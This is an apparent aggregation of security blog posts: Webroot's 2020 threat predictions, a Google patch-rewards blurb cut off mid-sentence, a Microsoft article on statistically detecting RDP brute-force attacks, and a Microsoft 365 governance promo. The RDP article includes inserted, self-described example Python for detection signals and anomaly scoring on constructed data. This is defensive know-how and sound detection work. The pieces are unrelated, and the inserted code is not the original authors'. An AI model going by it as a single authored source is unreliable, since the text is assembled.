Our experts predict many of the trends they’ve been tracking throughout the year—well-researched attacks, RDP compromise, and the importance of user education—will continue into the New Year. But they’ll be affected by new industry developments such as impending privacy regulations, AI-enabled attacks, and attacks targeting developing nations. 

Highly Targeted Ransomware Will Continue to Devastate Businesses

Unsurprisingly, our experts predict the strong trend toward highly targeted ransomware will bleed into 2020.  

“Highly targeted ransomware will likely continue,” predicts Webroot Software Management Manager Eric Klonowski. “Next year, we predict ransom-motivated attackers will more pointedly observe automatic backup solutions and make attempts to remove and alter the backup data or the task itself.”

High-effort, low-volume surveillance techniques are now favored by ransomware operators like the Bitpaymer Group, which has been known to customize ransomware only hours before deploying an attack, first tailoring it to observations gathered on their targets. 

We should expect actors like these to continue to gain access to networks from where they can observe financial transactions and valuable information before determining the most profitable way to strike at their intended targets. 

Phishing will likely also become more targeted as data collected from breaches is incorporated into phishing emails. Things like passwords and recent transactions can go a long way in convincing people an email is legit.—Grayson Milbourne, Security Intelligence Director, Webroot

Long-Awaited Privacy Legislation Will Finally Arrive in the U.S. 

We expect that privacy and security will continue to jockey for primacy of concern in the minds of U.S. citizens. California, which has long led the fight for more stringent data privacy for consumers, is set to enact a law in early 2020 that has often drawn comparisons to Europe’s GDPR. 

As noted by Tech Crunch, California’s new data privacy act, like GDPR, will extend to all organizations that do business with Californians, effectively making it the law of the land nationwide. But Webroot Product Marketing Director George Anderson predicts a groundswell of support among U.S. citizens for stricter data privacy regulations. 

“U.S. citizens will step up their demands for privacy in 2020,” he says. “Privacy legislation in the U.S., which has lagged behind other nations, will be a central issue.” 

But rather than settling for a new set of standards, Anderson wouldn’t be surprised if entirely new revenue models are explored. Models that rely less on selling personal data than, say, subscription fees or some other alternative. 

“I would expect an alternative of paid-for services that don’t abuse data will emerge,” Anderson says. “The existing, untrusted purveyors of convenience will try to pivot, but ultimately lose out heavily. Legislation and technology are starting to converge due to so many abuses of privacy.”

“Adversarial attacks against AI-based security products will likely grow in scope and complexity, which would highlight the fact that there are fundamentally two types of AI in cybersecurity: AI which acts like a smarter conventional signature and AI which is built into every facet of an intelligent, cloud-based platform capable of cross-referencing and defending itself against adversarial attacks.” —Joe Jaroch, Senior Director of Cybersecurity Strategy, Webroot

Small and Medium-Sized Businesses will Bear the Brunt of Cyberattacks

Findings regarding cybersecurity readiness among small and medium-sized businesses (SMBs) continue to be grim. Despite commonly falling victim to data breaches and other attacks, an attitude still pervades that they are either too small to catch the eye of cybercriminals or that their data isn’t valuable enough to warrant an attack. 

In a study conducted by Webroot and 451 Research, 71 percent of SMBs admitted to experiencing a breach or attack within the previous 24 months that resulted in “operational disruption, reputational damage, significant financial losses or regulatory penalties.”

According to Webroot Security Analyst Tyler Moffitt, that trend is unlikely to abate. 

“We expect that SMBs will continue to be targets for cybercriminals because, just like the public, education, and healthcare sectors, they maintain the same vulnerable environment. They’re low budget, understaffed, and often under-educated on matters of cybersecurity.”

Findings from the 451 Research report confirm Moffitt’s suspicions. A full 36 percent of SMBs surveyed in that study reported that they had no full-time staff on hand dedicated to cybersecurity. 

“The SMBs typically targeted have under 50 employees, and it often falls to a lone IT admin or someone in finance or sales to shore up cybersecurity at the company,” Moffitt says. “Almost always it’s a person who wears many hats and doesn’t have much of a budget or expertise.”

It’s the easily overlooked yet easily exploited security gaps like an unsecured RDP that most worry Moffitt. Without dedicated cybersecurity consulting, these can easily be exploited, yet they are easy to fix.

“Expect to see more attacks against less developed nations. Attacks like this don’t generate revenue, rather they are meant to disrupt and destroy.” —Grayson Milbourne, Security Intelligence Director, Webroot

We Want to Hear Your 2020 Predictions

Are these the developments you expect to see to kick off the new decade? Have some other ideas? We want to hear what hacks, news stories, or trends in cybersecurity you anticipate in the New Year. You can read additional predictions from our staff for the year ahead, plus submit your own, on the Webroot Community. Click here to visit the Community and share your 2020 predictions.

The post Cybersecurity Predictions for 2020: What Our Experts Have to Say appeared first on Webroot Blog.

Google Offers Financial Support to Open Source Projects for Cybersecurity

Besides rewarding ethical hackers from its pocket for responsibly reporting vulnerabilities in third-party open-source projects, Google today announced financial support for open source developers to help them arrange additional resources, prioritizing the security of their products. The initiative, called "Patch Rewards Program," was launched nearly 6 years ago, under which Google rewards

Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks

Computers with Windows Remote Desktop Protocol (RDP) exposed to the internet are an attractive target for adversaries because they present a simple and effective way to gain access to a network. Brute forcing RDP, a network communications protocol that provides remote access over TCP port 3389, does not require a high level of expertise or the use of exploits; attackers can use many off-the-shelf tools to scan the internet for potential victims and similar tools to conduct the brute force attack itself.

Attackers target RDP servers that use weak passwords and are without multi-factor authentication, virtual private networks (VPNs), and other security protections. Through RDP brute force, threat actor groups can gain access to target machines and conduct many follow-on activities like ransomware and coin mining operations.

In a brute force attack, adversaries attempt to sign in to an account by trial and error. Many failed sign-ins within very short time windows, typically minutes or even seconds, are usually associated with these attacks. A brute force attack might also involve adversaries attempting to access one or more accounts using valid usernames obtained through credential theft, or common usernames like “administrator”; the same holds for password choices. In detecting RDP brute force attacks, we focus on the source IP address and username, as password data is not available.

In the Windows operating system, whenever a sign-in attempt on a local machine fails, Windows security auditing records Event ID 4625 in the Security event log together with the username that was tried. The source IP addresses of inbound RDP connections are also available; this information is very useful in assessing whether a machine is under brute force attack. Combining it with Event ID 4624 (successful sign-in) on non-server Windows machines shows which sign-in sessions were actually created and further helps in detecting whether a local machine has been compromised.

In this blog we’ll present a study and a detection logic that uses these signals. This data science-driven approach to detecting RDP brute force attacks has proven valuable in detecting human adversary activity through Microsoft Threat Experts, the managed threat hunting service in Microsoft Defender Advanced Threat Protection. This work is an example of how the close collaboration between data scientists and threat hunters results in protection for customers against real-world threats.

Insights into brute force attacks

Observing a sudden, relatively large count of Event ID 4625 associated with RDP network connections might be rare, but it does not necessarily imply that a machine is under attack. For example, a script that performs the following actions would look suspicious in a time series of failed sign-in counts but is most likely not malicious:

  • uses an expired password
  • retries sign-in attempts every N minutes with different usernames
  • connects from a public IP address within a range owned by the enterprise

In contrast, behavior that includes the following is indicative of an attack:

  • extreme counts of failed sign-ins from many unknown usernames
  • never previously successfully authenticated
  • from multiple RDP connections
  • from new source IP addresses

Understanding the context of failed sign-ins and inbound connections is key to discriminating between true positive (TP) and false positive (FP) brute force attacks, especially if the goal is to automatically raise only high-precision alerts to the appropriate recipients, as we do in Microsoft Defender ATP.

We analyzed several months’ worth of data to mine insights into the types of RDP brute force attacks occurring across Microsoft Defender ATP customers. Out of about 45,000 machines that had both RDP public IP connections and at least one failed network sign-in, we discovered that, on average, several hundred machines per day had a high probability of undergoing one or more RDP brute force attack attempts. Of the subpopulation of machines with detected brute force attacks, the attacks lasted 2-3 days on average, with about 90% of cases lasting for 1 week or less, and less than 5% lasting for 2 weeks or more.

Figure 1: Empirical distribution in number of days per machine where we observed 1 or more brute force attacks

As discussed in numerous other studies [1], large counts of failed sign-ins are often associated with brute force attacks. Looking at the count of daily failed sign-ins, 90% of cases exceeded 10 attempts, with a median larger than 60. In addition, these unusual daily counts had a high positive correlation with extreme counts in shorter time windows (see Figure 2). In fact, the extreme daily counts of failed sign-ins were typically concentrated within under 2 hours, with about 40% occurring in under 30 minutes.

Figure 2: Count of daily and maximum hourly network failed sign-ins for a local machine under brute force attack

While a detection logic based on thresholding the count of failed sign-ins within a daily or finer-grained time window can detect many brute force attacks, it will likely produce too many false positives. Worse, relying on this alone will also yield false negatives, missing successful enterprise compromises: our analysis revealed several instances where brute force attacks generated fewer than 5-10 failed attempts per day but persisted for many days, thereby avoiding extreme counts at any single point in time. For such a low-and-slow brute force attack, thresholding the cumulative number of failed sign-ins across time can be more useful, as depicted in Figure 3.

Figure 3: Daily and cumulative failed network sign-in

Looking at counts of failed network sign-ins provides a useful but incomplete picture of RDP brute force attacks. This can be further augmented with additional information on the failed sign-in, such as the failure reason, time of day, and day of week, as well as the username itself. An especially strong signal is the source IP of the inbound RDP connection. Knowing whether the external IP has a history of reported abuse, as can be looked up on public IP-reputation sites, can directly confirm that an IP is part of an active brute force campaign.

Unfortunately, not all attacking IP addresses have a history of abuse; in addition, it can be expensive to retrieve reputation data for many external IP addresses on demand. Maintaining a list of suspicious IPs is an option, but relying on it can result in false negatives as, inevitably, new IPs continually appear, particularly with the adoption of cloud computing and the ease of spinning up virtual machines. A generic signal that can augment failed sign-in and user information is the count of distinct RDP connections from external IP addresses. Again, extreme values occurring at a given time or cumulated over time can be an indicator of attack.

Figure 4 shows histograms (i.e., counts put into discrete bins) of daily counts of public RDP connections per machine for an example enterprise with known brute force attacks. It’s evident that normal machines have a lower probability of large counts than attacked machines.

Figure 4: Histograms of daily count of RDP inbound across machines for an example enterprise

Given that some enterprises have machines under brute force attack daily, the priority may be to focus on machines that have been compromised, defined by a first successful sign-in following failed attempts from suspicious source IP addresses or unusual usernames. In Windows logs, Event ID 4624 can be used to measure successful sign-in events for a local machine, in combination with failed sign-ins (Event ID 4625).

Out of the hundreds of machines with RDP brute force attacks detected in our analysis, we found that about 0.08% were compromised. Furthermore, across all enterprises analyzed over several months, on average about one machine was detected with a high probability of being compromised as a result of an RDP brute force attack every 3-4 days. Figure 5 shows a bubble chart of the average abuse score of external IPs associated with RDP brute force attacks that successfully compromised machines. The size of each bubble is determined by the count of distinct machines across the enterprises analyzed having a network connection from that IP. While there is diversity in the origin of the source IPs, the Netherlands, Russia, and the United Kingdom have a larger concentration of inbound RDP connections from high-abuse IPs.

Figure 5: Bubble chart of IP abuse score versus counts of machine with inbound RDP

A key takeaway from our analysis is that successful brute force attempts are not uncommon; therefore, it’s critical to monitor at least the suspicious connections and unusual failed sign-ins that result in authenticated sign-in events. In the following sections we describe a methodology to do this. This methodology was leveraged by Microsoft Threat Experts to augment threat hunting and resulted in new targeted attack notifications.

Combining many relevant signals

As discussed earlier (with the example of scripts connecting via RDP using outdated passwords yielding failed sign-ins), simply relying on thresholding failed attempts per machine for detecting brute force attacks can be noisy and may result in many false positives. A better strategy is to utilize many contextually relevant signals, such as:

  • the timing, type, and count of failed sign-ins
  • username history
  • type and frequency of network connections
  • first-time username from a new source machine with a successful sign-in

This can be even further extended to include indicators of attack associated with brute force, such as port scanning.

Combining multiple signals along the attack chain has been proposed and shown promising results [2]. We considered the following signals in detecting RDP inbound brute force attacks per machine:

  • hour of day and day of week of failed sign-in and RDP connections
  • timing of successful sign-in following failed attempts
  • Event ID 4625 logon type (filtered to network and remote interactive)
  • Event ID 4625 failure reason (filtered to %%2308, %%2312, %%2313)
  • cumulative count of distinct usernames that failed to sign in and never succeeded
  • count (and cumulative count) of failed sign-ins
  • count (and cumulative count) of RDP inbound external IP
  • count of other machines having RDP inbound connections from one or more of the same IP
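The following is an added example, not code from the article or from Microsoft Defender ATP, that derives several of the per-machine signals listed above from a constructed sample of Event ID 4625 and 4624 records (field names follow the Security log: TargetUserName, LogonType, IpAddress, FailureReason). It assumes logon types 3 (Network) and 10 (RemoteInteractive) for RDP and uses the failure-reason filter quoted above; it computes daily and cumulative failed-sign-in counts (the low-and-slow case from Figure 3), distinct usernames and source IPs, the number of other machines touched by the same source IP, and the article's compromise definition (a first-ever successful sign-in for a username following failures from the same source IP). The sample events are constructed, not real telemetry.

```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple, Tuple

RDP_LOGON_TYPES = {3, 10}                        # 3 = Network, 10 = RemoteInteractive (assumed RDP filter)
FAILURE_REASONS = {"%%2308", "%%2312", "%%2313"}  # the article's Event ID 4625 failure-reason filter


class Event(NamedTuple):
    time: datetime
    event_id: int        # 4625 = failed sign-in, 4624 = successful sign-in
    computer: str
    user: str            # TargetUserName
    logon_type: int      # LogonType
    source_ip: str       # IpAddress
    failure_reason: str  # FailureReason for 4625, "" for 4624


def ev(ts: str, eid: int, host: str, user: str, ltype: int, ip: str, reason: str = "") -> Event:
    return Event(datetime.fromisoformat(ts), eid, host, user, ltype, ip, reason)


# Constructed sample, not real telemetry. HOST-A: a scheduled script retrying one expired
# credential from an enterprise-owned IP (benign). HOST-B: a spray of unknown usernames from
# a new external IP that also touches HOST-C, then a first-ever successful sign-in for a
# username that previously failed (probable compromise).
SAMPLE_EVENTS: List[Event] = [
    ev("2019-08-04T01:00:00", 4625, "HOST-A", "svc_backup", 3, "203.0.113.10", "%%2313"),
    ev("2019-08-04T01:15:00", 4625, "HOST-A", "svc_backup", 3, "203.0.113.10", "%%2313"),
    ev("2019-08-04T01:30:00", 4625, "HOST-A", "svc_backup", 3, "203.0.113.10", "%%2313"),
    ev("2019-08-04T02:00:00", 4625, "HOST-B", "administrator", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-04T02:00:05", 4625, "HOST-B", "admin", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-04T02:00:09", 4625, "HOST-B", "test", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-04T02:00:14", 4625, "HOST-B", "user1", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-04T02:00:20", 4625, "HOST-B", "scanner", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-04T02:05:00", 4625, "HOST-C", "administrator", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-05T02:10:00", 4625, "HOST-B", "backup", 10, "198.51.100.7", "%%2313"),
    ev("2019-08-05T02:11:00", 4624, "HOST-B", "backup", 10, "198.51.100.7"),
    ev("2019-08-05T09:00:00", 4624, "HOST-A", "alice", 10, "10.0.0.5"),   # no prior failures from this IP
]


def is_rdp_failure(e: Event) -> bool:
    return (e.event_id == 4625 and e.logon_type in RDP_LOGON_TYPES
            and e.failure_reason in FAILURE_REASONS)


def daily_signals(events: List[Event]) -> Dict[Tuple[str, str], Dict[str, int]]:
    """Per (computer, ISO day): point counts for that day plus cumulative counts over the
    machine's history, i.e. the count / cumulative-count signals from the article's list."""
    per_day = defaultdict(lambda: {"failed": 0, "users": set(), "ips": set()})
    for e in filter(is_rdp_failure, events):
        d = per_day[(e.computer, e.time.date().isoformat())]
        d["failed"] += 1
        d["users"].add(e.user)
        d["ips"].add(e.source_ip)
    seen_users, seen_ips, cum_failed = defaultdict(set), defaultdict(set), defaultdict(int)
    out = {}
    for host, day in sorted(per_day):  # ISO day strings sort chronologically within a host
        d = per_day[(host, day)]
        cum_failed[host] += d["failed"]
        seen_users[host] |= d["users"]
        seen_ips[host] |= d["ips"]
        out[(host, day)] = {
            "failed": d["failed"], "cum_failed": cum_failed[host],
            "distinct_users": len(d["users"]), "cum_distinct_users": len(seen_users[host]),
            "distinct_ips": len(d["ips"]), "cum_distinct_ips": len(seen_ips[host]),
        }
    return out


def machines_per_source_ip(events: List[Event]) -> Dict[str, int]:
    """How many distinct machines saw RDP failures from each source IP: the
    'other machines with inbound connections from the same IP' signal."""
    hosts = defaultdict(set)
    for e in filter(is_rdp_failure, events):
        hosts[e.source_ip].add(e.computer)
    return {ip: len(h) for ip, h in hosts.items()}


def probable_compromises(events: List[Event]) -> List[Tuple[str, str, str, datetime]]:
    """Successful RDP sign-ins (4624) from a source IP that previously failed on the same
    machine, for a username that had never succeeded there before."""
    failed_ips, succeeded_users, hits = defaultdict(set), defaultdict(set), []
    for e in sorted(events, key=lambda x: x.time):
        if e.logon_type not in RDP_LOGON_TYPES:
            continue
        if e.event_id == 4625:
            failed_ips[e.computer].add(e.source_ip)
        elif e.event_id == 4624:
            if e.source_ip in failed_ips[e.computer] and e.user not in succeeded_users[e.computer]:
                hits.append((e.computer, e.user, e.source_ip, e.time))
            succeeded_users[e.computer].add(e.user)
    return hits


if __name__ == "__main__":
    for key, sig in daily_signals(SAMPLE_EVENTS).items():
        print(key, sig)
    print(machines_per_source_ip(SAMPLE_EVENTS))
    print(probable_compromises(SAMPLE_EVENTS))
```

On the sample, HOST-A shows three failures for one username from one enterprise IP (the benign script pattern), while HOST-B accumulates six failures across six never-seen usernames from a source IP that also hit HOST-C, followed by the first successful sign-in for one of those usernames; only the latter is reported as a probable compromise. In production the same per-(machine, day) records would feed the time series models described in the next section rather than fixed thresholds.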

Unsupervised probabilistic time series anomaly detection

For many cybersecurity problems, including detecting brute force attacks, previously labeled data is not usually available. Thus, training a supervised learning model is not feasible. This is where unsupervised learning is helpful, enabling one to discover and quantify unknown behaviors when examples are too sparse. Given that several of the signals we consider for modeling RDP brute force attacks are inherently dependent on values observed over time (for example, daily counts of failed sign-ins and counts of inbound connections), time series models are particularly beneficial. Specifically, time series anomaly detection naturally provides a logical framework to quantify uncertainty in modeling temporal changes in data and produce probabilities that then can be ranked and thresholded to control a desirable false positive rate.

Time series anomaly detection captures the temporal dynamics of signals and quantifies the probability of observing values at any point in time under normal operating conditions. More formally, if we introduce the notation Y(t) to denote a signal taking on values at time t, then we build a model to compute reliable estimates of the probability of Y(t) being at least as large as the observed value y(t), given all known and relevant information; we write this right-tail probability as P[y(t)], sometimes called an anomaly score. Given a false positive tolerance rate r (e.g., 0.1%, i.e., 1 out of 1,000 per time step), for each time t, values y*(t) satisfying P[y*(t)] < r would be detected as anomalous. Assuming the right signals reflecting the relevant behaviors of the type of attack are chosen, the idea is simple: the lowest anomaly scores at each time step are the ones most likely to correspond to real threats.

For example, looking back at Figure 2, the time series of daily counts of failed sign-ins on the brute force attack day 8/4/2019 had extreme values that would be associated with an empirical probability of about 0.03% out of all machine-days with at least one failed network sign-in for the enterprise.

As discussed earlier, applying anomaly detection to 1 or a few signals to detect real attacks can yield too many false positives. To mitigate this, we combined anomaly scores across eight signals we selected to model RDP brute force attack patterns. The details of our solution are included in the Appendix, but in summary, our methodology involves:

  • updating statistical discrete time series models sequentially for each signal, capturing time of day, day of week, and both point and cumulative effects
  • combining anomaly scores using an approach that yields accurate probability estimates, and
  • ranking the top N anomalies per day to control a desired number of false positives

Our approach to time series anomaly detection is computationally efficient and automatically updates its probabilities to adapt to changes in the data.

As we describe in the next section, this approach has yielded successful attack detection at high precision.

Protecting customers from real-world RDP brute force attacks through Microsoft Threat Experts

The proposed time series anomaly detection model was deployed and utilized by Microsoft Threat Experts to detect RDP brute force attacks during threat hunting activities. A list that ranks machines across enterprises with the lowest anomaly scores (indicating the likelihood of observing a value at least as large under expected conditions in all signals considered) is updated and reviewed every day. See Table 1 for an example.

Table 1: Sample ranking of detected RDP inbound brute force attacks

For each machine with detection of a probable brute force attack, each instance is assigned TP, FP, or unknown. Each TP is then assigned priority based on the severity of the attack. For high-priority TP, a targeted attack notification is sent to the associated organization with details about the active brute force attack and recommendations for mitigating the threat; otherwise the machine is closely monitored until more information is available.

We also added an extra capability to our anomaly detection: automatically sending targeted attack notifications about RDP brute force attacks, in many cases before the attack succeeds or before the actor is able to conduct further malicious activities. Looking at the most recent sample of about two weeks of graded detections, the average daily precision (the fraction of flagged machines graded as true positives) is approximately 93.7% at a conservative false positive rate of 1%.

In conclusion, based on our careful selection of signals found to be highly associated with RDP brute force attacks, we demonstrated that proper application of time series anomaly detection can be very accurate in identifying real threats. We have filed a patent application for this probabilistic time series model for detecting RDP inbound brute force attacks. In addition, we are working on integrating this capability into Microsoft Defender ATP’s endpoint detection and response (EDR) capabilities so that the detection logic can raise alerts on RDP brute force attacks in real time.

Monitoring suspicious activity in failed sign-ins and network connections should be taken seriously—a real-time anomaly detection capable of self-updating with the changing dynamics in a network can indeed provide a sustainable solution. While Microsoft Defender ATP already has many anomaly detection capabilities integrated into its EDR capabilities, which enrich advanced threat protection across the broader Microsoft Threat Protection, we will continue to enhance these detections to cover more security scenarios. Using data science, we will continue to combine robust statistical and machine learning approaches with threat expertise and intelligence to deliver industry-leading protection to our customers through Microsoft Threat Protection.



Cole Sodja, Justin Carroll, Joshua Neil
Microsoft Defender ATP Research Team



Appendix 1: Models formulation

We utilize hierarchical zero-adjusted negative binomial dynamic models to capture the characteristics of the highly discrete count time series. Specifically, as shown in Figure 2, it’s expected that most of the time there won’t be failed sign-ins for valid credentials on a local machine; hence, there are excess zeros that would not be explained by standard probability distributions such as the negative binomial. In addition, the variance of non-zero counts is often much larger than the mean, where for example, valid scripts connecting via RDP can generate counts in the 20s or more over several minutes because of an outdated password. Moreover, given a combination of multiple users or scripts connecting to shared machines at the same time, this can generate more extreme counts at higher quantiles resulting in heavier tails, as seen in Figure 6.

Figure 6: Daily count of network failed sign-in for a machine with no brute force attack

Parametric discrete location/scale distributions do not generate well-calibrated p-values for such sparse, heavy-tailed time series, as seen in Figure 6, and if used to detect anomalies they can result in too many FPs when looking across many machines at high time frequencies. To overcome this challenge with the sparse time series of counts of failed sign-ins and inbound public RDP connections, we specify a mixture model; based on our analysis, a zero-inflated two-component negative binomial distribution was adequate.

Our formulation is based on thresholding values that determine when to transition to a distribution with larger location and/or scale as given in Equation 1. Hierarchical priors are given from empirical estimates of the sample moments across machines using about 1 month of data.

Equation 1: Zero-adjusted negative binomial threshold model

Negative binomial distribution (NB):

To our knowledge, this formulation does not yield a conjugate prior, and so directly computing probabilities from the posterior predicted density is not feasible. Instead, anomaly scores are generated based on drawing samples from all distributions and then computing the empirical right-tail p-value.

Updating parameters is done based on applying exponential smoothing. To avoid outliers skewing estimates, such as machines under brute force or other attacks, trimming is applied to sample from the distribution at a specified false positive rate, which was set to .1% for our study. Algorithm 1 outlines the logic.

The smoothing parameters were learned by maximum likelihood estimation and then fixed during each new sequential update. To induce further uncertainty, bootstrapping across machines is done to produce a histogram of smoothing weights, and samples are drawn in accordance with their frequency. We found that weights concentrated away from 0 vary between 0.06% and 8% for over 90% of machines, thus leading to slow changes in the parameters. An extension using adaptive forgetting factors will be considered in future work to automatically learn how to correct smoothing in real time.

Algorithm 2: Updating model parameters real-time
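As an added example that is not the article's model or Microsoft's code, the stdlib-only Python below implements a simplified version of the appendix: a zero-adjusted negative binomial baseline for one count signal, the right-tail p-value P[Y ≥ y] used as the anomaly score (flagged when below the tolerance r from the main text), and an exponential-smoothing parameter update that trims observations beyond the r-quantile so that a machine under attack does not inflate its own baseline. The simplifications are assumptions of this example: a single NB component with fixed parameters per step (so the tail probability is computed exactly rather than by sampling a posterior), no hierarchical priors, and a moment-based fit of the NB component on the non-zero counts. The parameter values and count windows are constructed.

```python
import math
from typing import List, Optional


class ZeroAdjustedNB:
    """Zero-inflated negative binomial baseline for one count signal on one machine."""

    def __init__(self, pi0: float, mean: float, var: float, alpha: float = 0.05):
        self.pi0 = pi0                     # extra probability mass at zero (the "zero adjustment")
        self.mean = mean                   # mean of the NB component
        self.var = max(var, mean * 1.01)   # NB requires var > mean (overdispersion)
        self.alpha = alpha                 # exponential smoothing weight

    def _nb_params(self):
        # NB(r, p) expressed through its mean m and variance v: p = m / v, r = m * p / (1 - p)
        p = self.mean / self.var
        return self.mean * p / (1 - p), p

    def nb_pmf(self, k: int) -> float:
        r, p = self._nb_params()
        log_pmf = (math.lgamma(k + r) - math.lgamma(k + 1) - math.lgamma(r)
                   + r * math.log(p) + k * math.log1p(-p))
        return math.exp(log_pmf)

    def pmf(self, k: int) -> float:
        if k == 0:
            return self.pi0 + (1 - self.pi0) * self.nb_pmf(0)
        return (1 - self.pi0) * self.nb_pmf(k)

    def anomaly_score(self, y: int) -> float:
        """Right-tail p-value P[Y >= y]; lower means more anomalous."""
        if y <= 0:
            return 1.0
        return max(0.0, 1.0 - sum(self.pmf(k) for k in range(y)))

    def is_anomalous(self, y: int, r: float) -> bool:
        """The main text's rule: flag y when P[y] < r."""
        return self.anomaly_score(y) < r

    def tail_quantile(self, r: float) -> int:
        """Smallest y that would be flagged at tolerance r; used as the trimming cutoff."""
        assert r > 0.0
        y = 0
        while self.anomaly_score(y) >= r:
            y += 1
        return y

    def update(self, counts: List[int], r: Optional[float] = 0.001) -> None:
        """Exponential-smoothing update of (pi0, mean, var) from a new window of counts.
        Values at or above the r-tail quantile are trimmed first, as in the article, so an
        attack does not pull the baseline upward; r=None disables trimming (for comparison)."""
        cutoff = self.tail_quantile(r) if r is not None else math.inf
        kept = [c for c in counts if c < cutoff]
        if not kept:
            return
        nonzero = [c for c in kept if c > 0]
        a = self.alpha
        self.pi0 = (1 - a) * self.pi0 + a * (1 - len(nonzero) / len(kept))
        if len(nonzero) >= 2:  # moment estimates of the NB component from non-zero counts
            m = sum(nonzero) / len(nonzero)
            v = sum((c - m) ** 2 for c in nonzero) / (len(nonzero) - 1)
            self.mean = (1 - a) * self.mean + a * m
            self.var = max((1 - a) * self.var + a * v, self.mean * 1.01)


if __name__ == "__main__":
    # Constructed baseline: failed sign-ins are zero on ~70% of days, otherwise mean 4, variance 16.
    model = ZeroAdjustedNB(pi0=0.7, mean=4.0, var=16.0)
    for y in (0, 1, 5, 20, 60):
        print(y, round(model.anomaly_score(y), 6), model.is_anomalous(y, r=0.001))
    # A week with one brute-force day (200 failures): trimming keeps the baseline near 4.
    model.update([0, 0, 0, 3, 5, 0, 200])
    print(model.mean, model.var, model.pi0)
```

The trimming step is the practical point: without it, a single attack day with 200 failures would pull the smoothed mean from 4 to above 7 and make the next attack look less surprising; with the trim at r = 0.1% the 200 is discarded before updating and the mean stays at 4.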

Appendix 2: Fisher Combination

For a given device, a score defined as a p-value is computed for each available signal, where lower values are associated with a higher likelihood of being an anomaly. The p-values are then combined to yield a joint score across all signals using the Fisher p-value combination method, as follows:

The use of Fisher’s test applied to anomaly scores produces a scalable solution that yields interpretable probabilities that thus can be controlled to achieve a desired false positive rate. This has even been applied in a cybersecurity context. [3]
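The following is an added example, not the article's code, of the combination and ranking steps described in this appendix and in the methodology summary above. It uses the standard form of Fisher's method: for k independent p-values, X = -2 Σ ln p_i follows a chi-square distribution with 2k degrees of freedom under the null, and because 2k is even the survival function has the closed form exp(-x/2) Σ_{i<k} (x/2)^i / i!, so no statistics library is needed. The per-signal p-values for the three hypothetical machines are constructed.

```python
import math
from typing import Dict, List, Tuple


def chi2_sf_even_df(x: float, df: int) -> float:
    """P[Chi2(df) > x] for even df, via the closed-form series exp(-x/2) * sum (x/2)^i / i!."""
    assert df > 0 and df % 2 == 0, "closed form holds for even degrees of freedom only"
    half, term, total = x / 2.0, 1.0, 1.0
    for i in range(1, df // 2):
        term *= half / i
        total += term
    return math.exp(-half) * total


def fisher_combined_pvalue(pvalues: List[float]) -> float:
    """Fisher's method: combine k independent p-values into one p-value."""
    ps = [min(max(p, 1e-300), 1.0) for p in pvalues]   # clamp to avoid log(0)
    x = -2.0 * sum(math.log(p) for p in ps)
    return chi2_sf_even_df(x, 2 * len(ps))


def rank_machines(scores: Dict[str, List[float]], top_n: int, r: float) -> List[Tuple[str, float]]:
    """Combine each machine's per-signal scores and return up to top_n machines with the
    lowest joint p-values that also fall below the false-positive tolerance r."""
    combined = {m: fisher_combined_pvalue(ps) for m, ps in scores.items()}
    ranked = sorted(combined.items(), key=lambda kv: kv[1])
    return [(m, p) for m, p in ranked if p < r][:top_n]


# Constructed per-signal anomaly scores (one p-value per signal, eight signals each).
SAMPLE_SCORES: Dict[str, List[float]] = {
    "HOST-B": [0.0003, 0.002, 0.01, 0.05, 0.2, 0.4, 0.001, 0.3],   # several signals extreme
    "HOST-A": [0.03, 0.5, 0.6, 0.9, 0.7, 0.8, 0.45, 0.6],          # one mildly unusual signal
    "HOST-C": [0.2, 0.3, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95],           # nothing unusual
}

if __name__ == "__main__":
    for host, ps in SAMPLE_SCORES.items():
        print(host, fisher_combined_pvalue(ps))
    print(rank_machines(SAMPLE_SCORES, top_n=2, r=0.01))
```

Only HOST-B survives a 1% tolerance: several moderately small p-values compound into a joint p-value on the order of 1e-7, while HOST-A's single 0.03 is absorbed by its unremarkable other signals. The clamp at 1e-300 matters in practice, since a signal that has never been observed at all would otherwise produce log(0).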



[1] Najafabadi et al., Machine Learning for Detecting Brute Force Attacks at the Network Level, 2014 IEEE 14th International Conference on Bioinformatics and Bioengineering
[2] Sexton et al., Attack chain detection, Statistical Analysis and Data Mining, 2015
[3] Heard, Combining Weak Statistical Evidence in Cyber Security, Intelligent Data Analysis XIV, 2015




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post Data science for cybersecurity: A probabilistic time series model for detecting RDP inbound brute force attacks appeared first on Microsoft Security.

Data governance and retention in your Microsoft 365 tenant—a secure and highly capable solution

Data governance has traditionally relied on transferring data to a third party that hosts an archive service. Emails, documents, chat logs, and third-party data (Bloomberg, Facebook, LinkedIn, etc.) must be saved in a way that cannot be changed and will not be lost. Data governance is part of IT at the enterprise level. It serves regulatory compliance, can facilitate eDiscovery, and is part of a business strategy to protect the integrity of the data estate.

However, there are downsides.

In addition to acquisition costs, the archive is one more system that needs ongoing maintenance. When data is moved to another system, the risk footprint is increased, and data can be compromised in transit. An at-rest archive can become another target of attack.

When you move the data to an external archive, you miss the opportunity to reason over it with machine learning to extract additional business value and insights to improve the governance program.

The game changer is to have reliable, auditable retention inside the Microsoft 365 tenant. This way, all the security controls and visibility in Microsoft 365 and Azure remain in effect. There is no additional archive to be attacked, protected, or monitored. In addition, there is no third-party archiving system to be purchased or maintained.

All the machine learning and correlation tools—always on and native to Microsoft 365—are reasoning over your data estate. Dark data can be illuminated.

Microsoft 365 tenant dashboards

Microsoft 365 dashboards are created automatically. Tiles allow you to drill down to the file level and locate sensitive data. Retention, disposition review, and deletion policies can be visualized, and compliance verified. Audit-ready governance reports can be generated.

Screenshot of label analytics in the Microsoft 365 compliance tenant dashboard.

Your data governance program becomes measurable, manageable, and useable. It adds value to your business rather than being just a compliance tool.

Data governance is more than retention for Microsoft 365. Businesses rely on non-Microsoft solutions as well. There are built-in connectors for Bloomberg, Facebook, LinkedIn, and other popular third-party applications that allow this data to be brought into Microsoft 365 for retention.

Screenshot of a connector being added in the Office 365 Security & Compliance dashboard.

